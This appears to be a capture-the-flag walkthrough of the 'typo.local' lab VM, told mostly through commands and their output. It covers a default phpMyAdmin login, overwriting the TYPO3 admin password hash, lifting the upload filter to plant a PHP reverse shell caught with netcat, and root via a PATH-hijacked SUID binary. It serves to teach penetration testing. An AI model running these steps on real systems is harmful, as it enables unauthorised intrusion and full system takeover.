I have added the machine to my hosts file, so Let’s Begin!
root@kali:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.208 typo.local
Initial Enumeration and Shell
I started the reconnaissance by running a port scan with Nmap, checking default scripts and testing for vulnerabilities.
root@kali:~# nmap -sC -sV -oA nmap/typo typo.local Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 13:06 IST Nmap scan report for typo.local (192.168.1.208) Host is up (0.00051s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 cd:dc:8f:24:51:73:54:bc:87:62:a2:e6:ed:f1:c1:b4 (RSA) | 256 a9:39:a9:bf:b2:f7:01:22:65:07:be:15:48:e8:ef:11 (ECDSA) |_ 256 77:f5:a9:ff:a6:44:7c:9c:34:41:f1:ec:73:5e:57:bd (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-generator: TYPO3 CMS |_http-server-header: Apache/2.4.38 (Debian) | http-title: Armour: Infosec |_Requested resource was http://typo.local/en/ 8000/tcp open http Apache httpd 2.4.38 | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Did not follow redirect to http://typo.local 8080/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesnt have a title (text/html). 8081/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesnt have a title (text/html). MAC Address: 08:00:27:BD:46:E3 (Oracle VirtualBox virtual NIC) Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.71 seconds
We have Apache Web Servers running on four different ports. Next step was to run a Gobuster scan to look for hidden directories.
root@kali:~# gobuster dir -u http://typo.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o port80.log =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://typo.local [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== Starting gobuster =============================================================== /en (Status: 200) /license (Status: 403) /README (Status: 403) /changelog (Status: 403) /ChangeLog (Status: 403) /vendor (Status: 403) /fileadmin (Status: 301) /readme (Status: 403) /todo (Status: 403) /typo3temp (Status: 301) /TODO (Status: 403) /typo3 (Status: 301) /vendorsolutions (Status: 403) =============================================================== Finished ===============================================================
I found typo3 and typo3temp directories which suggests that this webserver is using typo3 cms. Then I performed the same scan on other ports and found a phpmyadmin directory on port 8081.
root@kali:~# gobuster dir -u http://typo.local:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o port8081.log =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://typo.local:8081 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/20 13:09:19 Starting gobuster =============================================================== /phpmyadmin (Status: 301) /server-status (Status: 403) =============================================================== 2020/06/20 13:12:05 Finished ===============================================================
First I went to the typo3 directory on port 80 and tried logging in with some default username and password but I wasn't successful. Then I went to the phpmyadmin directory on port 8081 and again tried some random username and passwords. This time I was able to login with username root and password root.
Inside the phpmyadmin, I found a database named TYPO3 inside which there was a table named be_users which contained two records.
These contain a password which is hashed using argon2id algorithm. I found a website named argon2.online which can be used to generate such hashes. I went to this website and created my own hash.
I replaced this hash with the admin’s password in the be_users table. Now, I was able to login into the typo3-cms on port80 using username admin and password madhav.
Then I went to the Filelist Panel to see if I can upload a php backdoor. Unfortunately, php uploads were disabled on this website. After some enumeration, I found an option named fileDenyUpload in Settings > Configure Installation-Wide Options which restricts certain extensions from being uploaded on the website. I cleared this option and saved the settings.
This time, I was able to upload the backdoor. I used the php-reverse-shell from pentest monkey.
Then I started a netcat listener, and sent a request to the backdoor I uploaded using curl on another terminal and got a reverse shell from the target machine.
root@kali:~# curl -v http://typo.local/fileadmin/shell.php * Trying 192.168.1.208:80... * TCP_NODELAY set * Connected to typo.local (192.168.1.208) port 80 (#0) > GET /fileadmin/shell.php HTTP/1.1 > Host: typo.local > User-Agent: curl/7.68.0 > Accept: */* >
root@kali:~# nc -lvnp 9001 listening on [any] 9001 ... connect to [192.168.1.11] from (UNKNOWN) [192.168.1.208] 48354 Linux typo 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux 13:28:24 up 23 min, 0 users, load average: 11.49, 11.52, 8.82 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: cant access tty; job control turned off $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@typo:/$
Rooting this box was trivial. I searched for SUID files and found an unusual binary named apache2-restart.
www-data@typo:/tmp$ find / -type f -perm -u=s 2>/dev/null find / -type f -perm -u=s 2>/dev/null /usr/bin/mount /usr/bin/newgrp /usr/bin/chfn /usr/bin/su /usr/bin/gpasswd /usr/bin/chsh /usr/bin/umount /usr/bin/passwd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/local/bin/apache2-restart /usr/local/bin/phpunit
As the name suggests, This binary restarts the apache2 service. I confirmed this by running strings command on the service.
This is one of the most common privilege escalation method. All we need to do is create our own version of the service in the /tmp directory and add that path to the PATH variable. Then we can call apache2-restart, which will execute our malicious service with root privileges.
www-data@typo:/tmp$ echo '/bin/bash' > service echo '/bin/bash' > service www-data@typo:/tmp$ chmod +x service chmod +x service www-data@typo:/tmp$ export PATH=/tmp/:$PATH export PATH=/tmp/:$PATH www-data@typo:/tmp$ apache2-restart apache2-restart root@typo:/tmp# id id uid=0(root) gid=0(root) groups=0(root),33(www-data)
Hurray! This worked as expected and now we can read our root flag.
root@typo:/tmp# cat /root/proof.txt cat /root/proof.txt Best of Luck $2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3aap2ff0LbLYZrF
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alexandr Ivanov.